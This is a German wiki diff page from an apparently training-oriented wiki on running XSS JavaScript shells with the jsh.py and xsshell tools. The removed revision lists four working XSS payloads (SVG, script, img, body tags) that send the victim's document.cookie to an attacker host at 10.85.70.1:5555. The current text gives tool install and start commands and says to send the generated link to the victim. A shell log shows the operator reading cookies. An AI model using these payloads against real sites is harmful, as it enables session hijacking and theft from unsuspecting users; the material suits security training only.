Xsshell: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 6: Zeile 6:
  
 
=start=
 
=start=
*./jsh.py -g -p 5555 -s 10.85.70.1
+
*./xsshell -host 127.0.0.1 -port 4444
<pre>
 
    __
 
  |(_  _ |_  _  |  |
 
\_|__)_> | |(/_ |  |
 
                      v3.1
 
  
Payloads:
+
xsshell -h
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
+
Usage of xsshell:
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)</script>
+
  -cert string
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
+
    ssl cert file
- BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie}></body>
+
  -host string
 +
    websocket listen address
 +
  -key string
 +
    ssl key file
 +
  -log string
 +
    specify a log file to log all console communication
 +
  -path string
 +
    websocket connection path (default "/s")
 +
  -port string
 +
    websocket listen port (default "8234")
 +
  -servdir string
 +
    specify a directory to serve files from. a file server will not be started if no directory is specified
 +
  -servpath string
 +
    specify the base url path that you want to serve files from (default "/static/")
 +
  -wrkdir string
 +
    working directory that will be used as the relative root path for any commands requiring user provided file paths
  
Listening on [any] 5555 for incoming JS shell ...
 
</pre>
 
 
=Payload=
 
=Payload=
 
*Payload muss ins Eingabefeld
 
*Payload muss ins Eingabefeld

Version vom 28. Juli 2021, 12:48 Uhr

git clone

  • sudo apt-get install go
  • go get github.com/raz-varren/xsshell
  • go install github.com/raz-varren/xsshell

start

  • ./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell: 

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

  • Payload muss ins Eingabefeld
  • Generierter Link wird zum Opfer geschickt

Die Shell

Listening on [any] 5555 for incoming JS shell ...
Got JS shell from [10.85.70.1] port 53146 to orville 5555
>>> var test = 'hacked by xinux'
>>> confirm(test)
>>> prompt(document.cookie)

Auf dem Client

Xss-poc-js-sh1.png

Links

Abgerufen von „http://wiki.ixheim.de/index.php?title=Xsshell&oldid=26277